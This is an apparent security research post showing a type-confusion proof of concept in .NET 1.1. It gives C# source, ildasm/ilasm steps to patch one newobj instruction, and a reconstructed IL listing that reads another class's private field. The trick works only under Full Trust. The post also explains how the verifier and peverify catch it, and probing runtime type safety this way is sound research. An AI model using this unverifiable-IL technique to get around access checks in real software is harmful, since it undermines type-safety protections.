Possible Type Confusion issue in .Net 1.1 (only works in Full Trust)

While doing my Rooting the CLR research I found something which I think could be a 'Type Confusion issue' in .Net 1.1 (see more details about these issues in this great document on Java Security published by the LSD Research group: http://lsd-pl.net/papers.html#java)

Here is my test:

1) Compile this:

    using System;

    namespace RootingTheClr
    {
        class classTest
        {
            public static void Main()
            {
                Console.WriteLine("\n\n classTest \n\n");
                normalClass ncTest = new normalClass();
                // the newobj emitted for this line (IL_0010) is the one patched in step 4
                maliciousClass mcTest = (maliciousClass)new maliciousClass();
                normalClass ncTestTarget = ncTest;
                Console.WriteLine("Public = " + mcTest.iPublicVar + "   Private = " + mcTest.iPrivateVar);
            }
        }

        class normalClass
        {
            public int iPublicVar;
            private int iPrivateVar;   // private: no other class may read it

            public normalClass()
            {
                iPrivateVar = 100;
                iPublicVar = 999;
            }
        }

        class maliciousClass
        {
            public int iPublicVar;
            public int iPrivateVar;    // same field order as normalClass, but public

            public maliciousClass()
            {
                iPrivateVar = 1;
                iPublicVar = 9;
            }
        }
    }

2) and you should get this (note the value of Private):

csc classtest.cs

Microsoft (R) Visual C# .NET Compiler version 7.10.3052.4
for Microsoft (R) .NET Framework version 1.1.4322
Copyright (C) Microsoft Corporation 2001-2002. All rights reserved.

classTest.cs(21,15): warning CS0169: The private field 'RootingTheClr.normalClass.iPrivateVar' is never used

classTest.exe

classTest

Public = 9   Private = 1

3) run ILDASM on the exe:

ildasm classTest.exe /out:classTest.il

// WARNING: Created Win32 resource file classTest.res

4) Open the .il file in Notepad and make this change:

notepad classTest.il

replace

IL_0010:  newobj     instance void RootingTheClr.maliciousClass::.ctor()

with

IL_0010:  newobj     instance void RootingTheClr.normalClass::.ctor()

5) Ilasm the file

ilasm classTest.il

Microsoft (R) .NET Framework IL Assembler.  Version 1.1.4322.573
Copyright (C) Microsoft Corporation 1998-2002. All rights reserved.
Assembling 'classTest.il', no listing file, to EXE --> 'classTest.EXE'
Source file is ANSI

Assembled method classTest::Main
Assembled method classTest::.ctor
Assembled method normalClass::.ctor
Assembled method maliciousClass::.ctor
Creating PE file

Emitting members:
Global
Class 1 Methods: 2;
Class 2 Fields: 2;     Methods: 1;
Class 3 Fields: 2;     Methods: 1;
Resolving member refs: 8 -> 8 defs, 0 refs
Writing PE file
Operation completed successfully

6) execute it (note the value of Private):

classTest.exe

classTest

Public = 999   Private = 100

7) This means that we successfully were able to treat an object of the class normalClass as an object of the class maliciousClass: the patched IL stores a normalClass reference into a local typed as maliciousClass, and every field access through that local is compiled against maliciousClass's layout. The attack vector occurs because iPrivateVar is a public var in maliciousClass and a private var in normalClass, so the accessibility check that would normally block the read is never applied

    class maliciousClass
    {
        public int iPublicVar;
        public int iPrivateVar;
        ...

    class normalClass
    {
        public int iPublicVar;
        private int iPrivateVar;
        ...



8) What is interesting is that this only works in Full Trust; if you try to run this in a partial trust environment (like from a local network share) you will get the following error:

classTest.exe

Unhandled Exception: System.Security.VerificationException: Operation could destabilize the runtime.
   at RootingTheClr.classTest.Main()

This means that the CLR in partial trust does do some verification on the compiled byte code which is not done in Full Trust (which will mean that the Microsoft Security Response Team will say that this is not a vulnerability and occurs by design :)

The difference comes from the default .NET 1.1 security policy: code in the MyComputer zone is granted FullTrust, which includes SecurityPermission with the SkipVerification flag, so the JIT compiles the patched stloc without checking that the type on the stack matches the local; code loaded from the LocalIntranet zone (a network share) is not granted SkipVerification, so the verifier runs and throws the VerificationException above. To find such IL without relying on the runtime, run peverify classTest.exe from the .NET Framework 1.1 SDK against the reassembled binary: it reports the type mismatch at the stloc regardless of where the assembly would later be loaded from.
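For reference, this is what the patched Main method looks like in the ILAsm text after step 4. It is a reconstruction written for this page from the C# source above, not the page's own ildasm output: the instruction offsets, the local-variable numbering and the .maxstack value are assumptions and may differ slightly from what your ildasm prints, although IL_0010 lines up with the patch line quoted in step 4. The reconstruction also assumes csc emits no castclass for the identity cast (maliciousClass)new maliciousClass(), which is consistent with the run in step 6 printing 999/100 instead of throwing an InvalidCastException. The comments mark the instruction the verifier rejects in partial trust and the field load that reads normalClass's private field.

```il
.method public hidebysig static void Main() cil managed
{
  .entrypoint
  // offsets and maxstack are assumed; check against your own ildasm output
  .maxstack  4
  .locals init (class RootingTheClr.normalClass V_0,      // ncTest
                class RootingTheClr.maliciousClass V_1,   // mcTest
                class RootingTheClr.normalClass V_2)      // ncTestTarget

  IL_0000:  ldstr      "\n\n classTest \n\n"
  IL_0005:  call       void [mscorlib]System.Console::WriteLine(string)

  IL_000a:  newobj     instance void RootingTheClr.normalClass::.ctor()
  IL_000f:  stloc.0

  // step 4 patch: this used to be maliciousClass::.ctor()
  IL_0010:  newobj     instance void RootingTheClr.normalClass::.ctor()
  // unverifiable: a normalClass reference is stored into a maliciousClass local.
  // In partial trust the verifier stops here ("Operation could destabilize the
  // runtime"); in Full Trust (SkipVerification) the JIT compiles it as-is.
  IL_0015:  stloc.1

  IL_0016:  ldloc.0
  IL_0017:  stloc.2

  IL_0018:  ldstr      "Public = "
  IL_001d:  ldloc.1
  // compiled against maliciousClass's layout: reads normalClass.iPublicVar (999)
  IL_001e:  ldfld      int32 RootingTheClr.maliciousClass::iPublicVar
  IL_0023:  box        [mscorlib]System.Int32
  IL_0028:  ldstr      "   Private = "
  IL_002d:  ldloc.1
  // same slot as normalClass's private iPrivateVar (100); the accessibility
  // check never fires because the field is public on maliciousClass
  IL_002e:  ldfld      int32 RootingTheClr.maliciousClass::iPrivateVar
  IL_0033:  box        [mscorlib]System.Int32
  IL_0038:  call       string [mscorlib]System.String::Concat(object, object, object, object)
  IL_003d:  call       void [mscorlib]System.Console::WriteLine(string)
  IL_0042:  ret
}
```

The rest of the .il file (the class and field declarations, the three constructors) stays exactly as ildasm emitted it; only the single newobj operand changes. The point to take from the listing is that nothing in the patched method performs a cast at all: the object identity is never checked, so the only thing standing between a normalClass instance and maliciousClass's view of its fields is whether the verifier is allowed to run before the JIT compiles the method.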